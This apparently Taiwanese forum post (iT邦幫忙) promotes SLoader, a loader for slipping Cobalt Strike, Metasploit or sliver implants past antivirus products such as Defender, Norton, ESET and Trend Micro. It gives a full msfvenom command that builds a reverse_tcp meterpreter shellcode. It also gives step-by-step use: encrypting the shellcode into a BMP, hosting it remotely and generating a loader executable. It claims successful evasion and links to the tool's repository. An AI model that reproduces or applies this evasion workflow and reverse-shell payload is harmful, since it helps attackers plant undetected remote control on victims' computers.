iT邦幫忙

2

繞過防毒軟體檢測-遠端控制PC

  • 分享至 

  • xImage
  •  

概要

SLoader 是一個幫助遠端控制工具繞過防毒軟體檢測的工具。

在進行深入攻防滲透時,常常需要植入 Cobalt Strike、Metasploit Framework、sliver 等工具的木馬程序來維持權限,但會被防毒軟體檢測到。Loader 可以協助遠端控制工具繞過 Defender、趨勢科技、Norton、McAfee 等防毒軟體的檢測。

技術實現

自訂擴展:利用模板自訂加載方式,創造新的加載方式。
隨機哈希:隨機生成檔案名稱,並以時間戳作為鍵對 URL 進行加密。
隱秘連結:loader 遠端加密連結 payload。
多重加密:使用 RC4、Base64、AES 演算法進行 payload 的加解密。

編譯環境

編譯環境:生成器、編碼器與加載模板均使用 C++ 開發,通過 Visual Studio 2022 靜態編譯。
編譯方式:通過 Visual Studio 2022 打開解決方案 (*.sln),選擇 release、x64 進行編譯。或直接下載使用realse

使用方式

image

使用 Cobalt Strike 生成 raw 格式的 shellcode 檔案(shellcode 的位元數取決於加載器模板的位元數),或者可以使用 msfvenom(msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=x -f raw -o beacon.bin)
image
通過 encode 對 shellcode 進行加密(加密金鑰需要 16 位元組)
image
將生成的 bmp 檔案上傳至遠端 WEB 伺服器生成下載連結(訪問 URL 可直接下載檔案)
打開生成器,填寫 bmp 檔案的 URL 與加密金鑰,選擇自訂的加載器模板(DATA 目錄)
image
點選 Generate,桌面上會生成可執行的加載器檔案
image

實際效果

ESET

image
image

Norton (Norton 會攔截沒有簽名的程式上網,因此需要對程式進行簽名)

image

Defender

image

Trend Micro (趨勢科技)

![image]https://ithelp.ithome.com.tw/upload/images/20240830/20168487llRwyd4fX4.png

連結:https://github.com/ED-E92/SLoader

圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言